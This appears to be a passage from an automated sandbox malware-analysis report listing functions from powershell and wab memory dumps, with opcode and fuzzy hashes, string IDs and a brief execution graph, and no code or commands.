                                                          • Opcode Fuzzy Hash: d599f8fa334c4287863cefbde9ec738b4473e47f083d1469485a8fd50c1a990d
                                                          • Instruction Fuzzy Hash: 9E31D892D1EA8B0BE3A796AC28211B86AD1FF557E5B5801BAC40DC31D3ED1CDC148342
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886E43945 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction ID: be3fd98d75d27ec4b1f607558638be3019c5f8a5eb3205554f58c07053ce29c0
                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction Fuzzy Hash: FB01677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3655DA36E881CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 07B72FBC Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 945dc2c5d1f30d8e401a169cc48eceba9a2ba6d637bd1e1cbb5c0c9539963942
                                                          • Instruction ID: cb0e2562d308a3b65abfd14df562dcb65dbbb023c997bb620362146bbe67b733
                                                          • Opcode Fuzzy Hash: 945dc2c5d1f30d8e401a169cc48eceba9a2ba6d637bd1e1cbb5c0c9539963942
                                                          • Instruction Fuzzy Hash: E65104B0A093C5EFD3128B64C814BA6BFF1EF86211F19C0DAD0559F2A2C636DC45D7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B75838 Relevance: 11.0, Strings: 8, Instructions: 1035COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                          • API String ID: 0-747792303
                                                          • Opcode ID: ad3700a73c60715419eb3e4ff594450b6f18ee884fb5945a807c34d09fe2eff7
                                                          • Instruction ID: dbacf9bc175174d1a6fd605a1e4a154ea7d1d6162d328e921f7a5288e952978a
                                                          • Opcode Fuzzy Hash: ad3700a73c60715419eb3e4ff594450b6f18ee884fb5945a807c34d09fe2eff7
                                                          • Instruction Fuzzy Hash: B49290B0B00305DFEB24DB68C880BAAB7B2EF85314F1484AAD815AF751DB71DC91CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B74728 Relevance: 10.9, Strings: 8, Instructions: 935COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                          • API String ID: 0-747792303
                                                          • Opcode ID: 753babe19d53b33cc744deae3c67ffa0314296bc482542404bf356385dc8de6d
                                                          • Instruction ID: 3181ed47a01731ba177f7c5cbc5e84ac7ada67f0f18edb8a7b01166796e951c6
                                                          • Opcode Fuzzy Hash: 753babe19d53b33cc744deae3c67ffa0314296bc482542404bf356385dc8de6d
                                                          • Instruction Fuzzy Hash: F5827CB4B00205DFEB24CB98C840B6ABBB2EF85315F25C4A9D8159F755DB71EC41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B750DD Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl
                                                          • API String ID: 0-3144609269
                                                          • Opcode ID: 988476df788284667fc4c3ff527ea865bc652c069c85b31d350569a3e7f8a543
                                                          • Instruction ID: 16fba95d707db5b39a4f6e1106670116b3cf94042cd4b23b97b3697cc401d202
                                                          • Opcode Fuzzy Hash: 988476df788284667fc4c3ff527ea865bc652c069c85b31d350569a3e7f8a543
                                                          • Instruction Fuzzy Hash: DA1269B4A00205DFEB24CB98C580F59BBB2EF85315F25C4A9E925AF755DB72EC41CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7E0E0 Relevance: 3.0, Strings: 2, Instructions: 525COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: 18fd248844398df305d42e2169dcb6a244cd5773ad8d1e73adac4ad9f2ce9448
                                                          • Instruction ID: 1c6d2889a6d8f760e8a41c0f89247f9bf622e695647a0c89611dcd141793ea22
                                                          • Opcode Fuzzy Hash: 18fd248844398df305d42e2169dcb6a244cd5773ad8d1e73adac4ad9f2ce9448
                                                          • Instruction Fuzzy Hash: 0C12AEF5B00205DFEB14CB68C454BAABBB2EF89210F2580EAD815AF751DB71DD41CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7CB81 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: 04e14782f007f4751169c88369d3cca23842a37a14d8e4c242049fcc1d6b8eb6
                                                          • Instruction ID: 7b37ebea1b5726e48e6dd2782ff9d6991e88fb51b5562cca29665a3342a31855
                                                          • Opcode Fuzzy Hash: 04e14782f007f4751169c88369d3cca23842a37a14d8e4c242049fcc1d6b8eb6
                                                          • Instruction Fuzzy Hash: FF023AB4A002199FE724DB28C990BDEB7B2AF85304F1085E6D9096F741DB75AEC1CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7624B Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: 9a81558981e6620f9e197fdc496493e166c1d29ec7a0f77921d2422749ac0f17
                                                          • Instruction ID: 01a757a526269bdf06394bb3e7303b22d302cce1cdc06fb08419cdc4b1fff97d
                                                          • Opcode Fuzzy Hash: 9a81558981e6620f9e197fdc496493e166c1d29ec7a0f77921d2422749ac0f17
                                                          • Instruction Fuzzy Hash: FFF16BB4B003159FEB24DB28C851B5AB7B2AF89304F10C4E9D9096F791DB75ED81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B75490 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: c0c713441b8c6aba9b7b4123df758fceb872c5bc222cff5343e9150bf105d2b1
                                                          • Instruction ID: 5ea56009b42109ac1cff03579d7c3bd20de323572c1f0c629d877c31554bf653
                                                          • Opcode Fuzzy Hash: c0c713441b8c6aba9b7b4123df758fceb872c5bc222cff5343e9150bf105d2b1
                                                          • Instruction Fuzzy Hash: B3919EF4B00304ABE714DB68C545B9AB7F2EF89314F2480A9E9016F791DB76EC51CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7BE70 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: 4aa95afd24610276c091005a8721d477d2b20ecaf84d242ec57e98dbdf24027f
                                                          • Instruction ID: b3889cab4d0350da4652bef6346e818e010fb1a3f3fefe17735bf51c37d4e324
                                                          • Opcode Fuzzy Hash: 4aa95afd24610276c091005a8721d477d2b20ecaf84d242ec57e98dbdf24027f
                                                          • Instruction Fuzzy Hash: 49E1AEB4B003149FE714EB68C894B9EB7B2AF85304F1184A9D9096F391DB75EE81CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B75468 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: 55d41c637ffa655f929820fb115e03a5598d07114b6c7a745202060ab8ec5082
                                                          • Instruction ID: 537e1e29356feb01c9ad210f902be01731810e9e31f06797dd6e25db502605f7
                                                          • Opcode Fuzzy Hash: 55d41c637ffa655f929820fb115e03a5598d07114b6c7a745202060ab8ec5082
                                                          • Instruction Fuzzy Hash: 1D917CB4B00304AFE714DB68C584B9AB7B2EF89314F258099E9016F791DB76EC90CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7E42C Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: fa1b01fa18394f3b8049366410bf4da046ff31beeb646c655def4627f958e7d4
                                                          • Instruction ID: dc435441506dad3f2ad9519ee862a2a60b17f30f77abd5e05d537d79288dde05
                                                          • Opcode Fuzzy Hash: fa1b01fa18394f3b8049366410bf4da046ff31beeb646c655def4627f958e7d4
                                                          • Instruction Fuzzy Hash: F48127B4A00205DFEB14CF58C594AA9BBB2EF89314F19C0D9E815AB751DB72E841CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7E440 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: 0a7575c22c1a320eb4ada6baf8486db05e9b6bf18bd0f3eedeaa86bf5a5bcb53
                                                          • Instruction ID: 2ce68258ed4a20b1286be788cae1204f76f85e3e5c68af5012ab1c6fdead9c01
                                                          • Opcode Fuzzy Hash: 0a7575c22c1a320eb4ada6baf8486db05e9b6bf18bd0f3eedeaa86bf5a5bcb53
                                                          • Instruction Fuzzy Hash: B08128B4A00209DFEB14CF58C584AAABBB2EF89314F15C0D9E815AB351DB72E841CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7B74D Relevance: .7, Instructions: 704COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cecd574f5d3ce059f1b0eec30a49650106ce2fe6373a72b9f1dad3b46102cb3f
                                                          • Instruction ID: 197279743596ef410df41b0078849960a9c843caff5b416dc5fefc02a097ab00
                                                          • Opcode Fuzzy Hash: cecd574f5d3ce059f1b0eec30a49650106ce2fe6373a72b9f1dad3b46102cb3f
                                                          • Instruction Fuzzy Hash: BC624CB4A002189FE714DB68C990BDEB7B2EF89304F1085E9D9096F351DB75AE81CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B70638 Relevance: .5, Instructions: 486COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c4b98dfb326ca26cbc796353b1f76864d100e10a11f56e50532406df4d26988
                                                          • Instruction ID: 9c2669bb4f76b2b72069e1b7521888311c65b7f8d417ce4de57cb5db84be98f5
                                                          • Opcode Fuzzy Hash: 4c4b98dfb326ca26cbc796353b1f76864d100e10a11f56e50532406df4d26988
                                                          • Instruction Fuzzy Hash: F1F113F1704346DFEB25AB68D81076ABBB6EFC6211F28C0ABD465CB351DA31D841C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B77020 Relevance: .3, Instructions: 339COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e2ef19cc47176930291bfa22beac4313cf95a91d8f64be5d897023fbfe9c55d
                                                          • Instruction ID: 7091efb9188852f11276446343c93e00a482cdf6fea4d8015bd8a208407651da
                                                          • Opcode Fuzzy Hash: 9e2ef19cc47176930291bfa22beac4313cf95a91d8f64be5d897023fbfe9c55d
                                                          • Instruction Fuzzy Hash: BFD18DB0B002099BEB14DB68C455B9EB7B2EF89314F21C4A9E8116F391DF75DC42CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B76FC8 Relevance: .3, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15ee25e01d49e3c41cac677050e53be3d1cbc032eee6e12d8cab875bc903459d
                                                          • Instruction ID: f45f818a5b09e16c6cbeeb48f89936caa2d28c0a526e888e986fa36d41a72e5a
                                                          • Opcode Fuzzy Hash: 15ee25e01d49e3c41cac677050e53be3d1cbc032eee6e12d8cab875bc903459d
                                                          • Instruction Fuzzy Hash: 6AC1ADB0A003059FEB14DF68C494B9ABBB2EF89314F25C09AD8116F391DF75E842CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B72C70 Relevance: .2, Instructions: 164COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 928324d882a459b5d65451e4e5fd30e8cf19920bacf5f213469352d3435aa1e2
                                                          • Instruction ID: 2874478871fa3af50476c29b1a4f5ad54263a636bd0cc745f06cf8a75f5a2dea
                                                          • Opcode Fuzzy Hash: 928324d882a459b5d65451e4e5fd30e8cf19920bacf5f213469352d3435aa1e2
                                                          • Instruction Fuzzy Hash: 3951F4F1708385DFEB258B74C810BAA7B71EFD6211F1880EBE465DB292DA358941C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B7E0CB Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 519acb777973f4a14bd7d9f74cd918dfda53b3774737613420849a55641d073b
                                                          • Instruction ID: 82bd6a5c49423946518293cafeb15f265d320e57f92fe75a3f5ccb1c31f46474
                                                          • Opcode Fuzzy Hash: 519acb777973f4a14bd7d9f74cd918dfda53b3774737613420849a55641d073b
                                                          • Instruction Fuzzy Hash: A83128F0B05302AFEB205A6959117797BA5DF82651F1440EBD4219FB81EB75CD81C3A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B77446 Relevance: .1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71a6f2efcdcc6ce8e39fa3712056399f45955cfea713a0fbcfafc0fce9ff9128
                                                          • Instruction ID: 29739efa844f059d6a8d0bdfc1a64804942c62568a4190207c7abf264c3a2c59
                                                          • Opcode Fuzzy Hash: 71a6f2efcdcc6ce8e39fa3712056399f45955cfea713a0fbcfafc0fce9ff9128
                                                          • Instruction Fuzzy Hash: 9C318FB4B40304ABE704AB64C858FAEB6B3EF85354F20C469E9016F790DEB6DC418BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B708C2 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13116e70ef11a03eb77dd5388c79e7e878f96bb2d577125d5160f554217e8b9d
                                                          • Instruction ID: e5de67e7f6735edd4140c5ae71e9ef1462f4540529c4faa5f02ea1b24ce47584
                                                          • Opcode Fuzzy Hash: 13116e70ef11a03eb77dd5388c79e7e878f96bb2d577125d5160f554217e8b9d
                                                          • Instruction Fuzzy Hash: F831E5F5604306DFFB10AF6DC440766BBB6EF95350F1580A7E8289B291D735C940CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 07B7D5C0 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          • Opcode ID: 4887486d227bfbb45dfe724b1984ed3449155bc1d9cbecfe15c6486c084b6da8
                                                          • Instruction ID: 866dc0b3946dae49d44416c957cd34bd93fa5e49327093eabf220158db2c21c8
                                                          • Opcode Fuzzy Hash: 4887486d227bfbb45dfe724b1984ed3449155bc1d9cbecfe15c6486c084b6da8
                                                          • Instruction Fuzzy Hash: 8BF139F4B00205DFEB14DB98C445B6AB7B2FF89254F2481A9D825AB744DB72EC41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B76B89 Relevance: 5.3, Strings: 4, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          • Opcode ID: 8e165980c1750d54c348920209ed5a2b6c47d6e6a84abe97f9ac7879058987fc
                                                          • Instruction ID: f7a2f04f7ae435fa9a97a23bafad2d50d945b1268a4619bfa774b96f1529d06e
                                                          • Opcode Fuzzy Hash: 8e165980c1750d54c348920209ed5a2b6c47d6e6a84abe97f9ac7879058987fc
                                                          • Instruction Fuzzy Hash: 03A172F4E00B05DFEB24CF54C480A6ABBB2FF85318F14859AD8656BB45D732A881CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B76BB0 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          • Opcode ID: 21f3e2a87016d08cdb74fe75bef1ecbf721e2bbd0bd5749dbb923c8ee996b49f
                                                          • Instruction ID: 328c982fb7e7ad1957630a5fa7d467bcba8eb6670edbf7b989b6c3b953b0af4a
                                                          • Opcode Fuzzy Hash: 21f3e2a87016d08cdb74fe75bef1ecbf721e2bbd0bd5749dbb923c8ee996b49f
                                                          • Instruction Fuzzy Hash: C3A142F4E01B05DBEB24CF54C481A6AB7B2FF85718F14859AD8256BB45D732E881CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07B77600 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          • Opcode ID: be720528cf33498244bf93cdc6eace36390eac788295e131e3d62963fdf5bdac
                                                          • Instruction ID: 284e0f4d05e8341a1ad2de4913a4a95ea4204fe1f65ca54e9424e4c323491a0a
                                                          • Opcode Fuzzy Hash: be720528cf33498244bf93cdc6eace36390eac788295e131e3d62963fdf5bdac
                                                          • Instruction Fuzzy Hash: 9D7159F4B10205DBEB14CB58C485BAABBB2EF89214F24C1A9D815AF355DF71EC81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:10%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:21
                                                          Total number of Limit Nodes:1
                                                          execution_graph 28811 28ae3238 28812 28ae3260 28811->28812 28815 28ae328c 28811->28815 28813 28ae3269 28812->28813 28816 28ae2784 28812->28816 28817 28ae278f 28816->28817 28818 28ae3583 28817->28818 28820 28ae27a0 28817->28820 28818->28815 28821 28ae35b8 OleInitialize 28820->28821 28822 28ae361c 28821->28822 28822->28818 28823 28ae1050 28824 28ae1055 28823->28824 28828 28ae1080 28824->28828 28832 28ae1070 28824->28832 28825 28ae106a 28829 28ae10c2 28828->28829 28831 28ae10c9 28828->28831 28830 28ae111a CallWindowProcW 28829->28830 28829->28831 28830->28831 28831->28825 28833 28ae1080 28832->28833 28834 28ae111a CallWindowProcW 28833->28834 28835 28ae10c9 28833->28835 28834->28835 28835->28825

                                                          Executed Functions

                                                          Function 28AF0040 Relevance: 2.8, Instructions: 2755COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae0006d04ef473e4667aac2e7d283812333a74cd76f4db46ba4f4c015a680dec
                                                          • Instruction ID: 0f17c074a0f218b4f3b3ab4e30249368fbe85c2249c64a790bf3fa194b7e7e41
                                                          • Opcode Fuzzy Hash: ae0006d04ef473e4667aac2e7d283812333a74cd76f4db46ba4f4c015a680dec
                                                          • Instruction Fuzzy Hash: 4F53D431D11B1A8ADB11EF68C894A99F7B1FF99300F11D79AE44877121EB70AAD4CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF0011 Relevance: 2.5, Instructions: 2475COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0a3d7fb909c3045573122ed9df8078cc824762e6f6f9e5a4ab951f774bdb1a1
                                                          • Instruction ID: f70e5b873cb6ad435d7b5cc1b7cb3dea1c31be3271480d1fba71764a104a3c05
                                                          • Opcode Fuzzy Hash: d0a3d7fb909c3045573122ed9df8078cc824762e6f6f9e5a4ab951f774bdb1a1
                                                          • Instruction Fuzzy Hash: 8B43D431D11B1A8ADB11EF68C894A99F7B1FF99300F11D79AE44877121EB70AAD4CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF33E8 Relevance: 2.2, Instructions: 2241COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b479c11e3c96d215b2da6497a8a043c52073ec86555ac351c2c2ccc79f499112
                                                          • Instruction ID: 694e1a659887fdb23229abb7dee03e058c91fdf5dcf99af1960e1c41ffa0b4fc
